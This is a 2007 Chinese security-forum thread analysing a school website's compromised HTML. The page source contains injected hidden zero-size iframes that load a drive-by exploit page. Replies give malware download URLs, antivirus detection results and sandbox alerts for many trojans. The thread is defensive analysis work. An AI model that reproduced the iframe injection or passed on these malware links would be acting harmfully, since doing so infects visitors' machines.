这段代码如何解密？？？

显示全部楼层 · 发表于 2007-12-14 11:36:23

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<iframe src=http://sp.070808.net/23.htm width=0 height=0></iframe>
<iframe src=http://sp.070808.net/23.htm width=0 height=0></iframe>
<script language="javascript">
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
</script>
<iframe src=http://sp.070808.net/23.htm width=0 height=0></iframe>
<meta http-equiv="Content-Type" c>
<title>宜昌市商业学校</title>
<link href="table.css" rel="stylesheet" type="text/css">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers.document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}
function MM_showHideLayers() { //v6.0
  var i,p,v,obj,args=MM_showHideLayers.argume

显示全部楼层 · 发表于 2007-12-14 11:38:04

hxxp://sp.070808.net/23.htm

显示全部楼层 · 发表于 2007-12-14 12:24:15

刺猬兄帮忙

显示全部楼层 · 发表于 2007-12-14 13:35:56

东西太多了，解出其中一个了
http://www.ip580.com/down.exe

近期来所出现的软件漏洞这个网站挂的基本都有了
很好！很齐全！

难得解了！

[ 本帖最后由 lovewei 于 2007-12-14 13:47 编辑 ]

显示全部楼层 · 发表于 2007-12-14 13:49:53

原帖由 lovewei 于 2007-12-14 13:35 发表
东西太多了，解出其中一个了
http://www.ip580.com/down.exe

近期来所出现的软件漏洞这个网站挂的基本都有了
很好！很齐全！

难得解了！

A-Squared	Found nothing
AntiVir	Found TR/Delphi.Downloader.Gen
ArcaVir	Found nothing
Avast	Found Win32:Delf-FKN
AVG Antivirus	Found Downloader.Generic6.YHD
BitDefender	Found Generic.Malware.SBdldsp.B0EACF78
ClamAV	Found nothing
CPsecure	Found nothing
Dr.Web	Found Win32.HLLW.Autoruner.origin
F-Prot Antivirus	Found Possibly a new variant of W32/SelfStarterInternetTrojan!Maximus
F-Secure Anti-Virus	Found Worm.Win32.AutoRun.os
Fortinet	Found nothing
Ikarus	Found Trojan-Downloader.Win32.Delf.bny
Kaspersky Anti-Virus	Found Worm.Win32.AutoRun.os
NOD32	Found a variant of Win32/AutoRun.K
Norman Virus Control	Found nothing
Panda Antivirus	Found nothing
Rising Antivirus	Found nothing
Sophos Antivirus	Found Mal/DelpDldr-C
VirusBuster	Found nothing
VBA32	Found Backdoor.XiaoBird.280 (paranoid heuristics) (probable variant)

显示全部楼层 · 发表于 2007-12-14 13:57:55

sss.969222.com/url.txt 还是这个!

显示全部楼层 · 发表于 2007-12-14 20:03:30

RX20.22.42未杀！

显示全部楼层 · 发表于 2007-12-14 20:07:46

F-Prot终于报了。。。
-----------------------------SCAN REPORT-----------------------------
F-PROT Antivirus for Windows

Antivirus Scanning Engine version number: 4.4.2
Virus signature file from: 2007-12-14, 3:08

Scan name: [Custom Scan]
Path to scan: C:\Documents and Settings\Administrator\桌面\virus4.rar

Normal scan
Also scan: Inside subfolders, Compressed files, Streams

Scan started: 2007-12-14, 20:07:26
---------------------------------------------------------------------

[Found security risk] <W32/AutoRun.B.gen!Eldorado (not disinfectable, generic)> C:\Documents and Settings\Administrator\桌面\virus4.rar->down.exe->(UPX)
[Contains infected objects] C:\Documents and Settings\Administrator\桌面\virus4.rar
[Quarantined] C:\Documents and Settings\Administrator\桌面\virus4.rar->down.exe->(UPX)

---------------------------------------------------------------------
Scan ended: 2007-12-14, 20:07:32
Duration: 0:00:06

Scan result:

Scanned files:    1
Infected objects:    1
Disinfected objects:    0
Quarantined files:    1
---------------------------------------------------------------------

显示全部楼层 · 发表于 2007-12-14 21:05:44

不弄了，又是一大堆，还是那几个漏洞
Adodb.Stream，MPS.StormPlayer，POWERPLAYER.PowerPlayerCtrl.1，MS06－014等等没有看完最多是加一个REAL的漏洞

显示全部楼层 · 发表于 2007-12-14 22:17:27

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A1.EXE
是可疑程序!
试图修改系统时间!
是否阻止该进程继续运行?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A2.EXE
木马程序生成以下文件:
1) C:\WINNT\SSLDYN.EXE
2) C:\WINNT\SYSTEM32\SSLDYN.DLL
是否删除木马程序及其衍生物?

木马名称:Trojan-Downloader.Win32.Delf.huy
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A4.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A5.EXE
木马程序生成以下文件:
1) C:\WINNT\UPXDND.EXE
2) C:\WINNT\SYSTEM32\UPXDND.DLL
是否删除木马程序及其衍生物?

木马名称:Trojan-Downloader.Win32.Agent.nme
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A7.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A8.EXE
1) C:\DFD2664851.BAT
是可疑程序!
试图删除文件!
是否阻止该进程继续运行?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A6.EXE
并生成以下文件:
1) E:\AUTORUN.EXE
2) C:\PROGRAM FILES\INTERNET EXPLORER\PLUGINS\WN_SYS8X.SYS
3) E:\AUTORUN.INF
4) E:\AUTORUN.EXE
是否删除木马程序及其衍生物?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A9.EXE
1) C:\DFD2729995.BAT
是可疑程序!
试图删除文件!
是否阻止该进程继续运行?

木马名称:Trojan-PSW.Win32.OLGames.abr
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A10.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan-PSW.Win32.OLGames.ari
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A11.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A13.EXE
木马程序生成以下文件:
1) C:\WINNT\351677M.EXE
2) C:\WINNT\351677MM.DLL
是否删除木马程序及其衍生物?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A14.EXE
1) C:\DFD2849577.BAT
是可疑程序!
试图删除文件!
是否阻止该进程继续运行?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A15.EXE
1) C:\DFD2885649.BAT
是可疑程序!
试图删除文件!
是否阻止该进程继续运行?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A16.EXE
1) C:\DFD2924735.BAT
是可疑程序!
试图删除文件!
是否阻止该进程继续运行?

程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A17.EXE
木马程序生成以下文件:
1) C:\WINNT\MSPRINT32D.EXE
2) C:\WINNT\SYSTEM32\MSPRINT32D.DLL
是否删除木马程序及其衍生物?

木马名称:Backdoor.Win32.Delf.caa
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\A20.EXE
是木马程序!
已成功阻止其运行,是否要删除此文件?

[其他相关] 这段代码如何解密？？？

本帖子中包含更多资源

浏览过的版块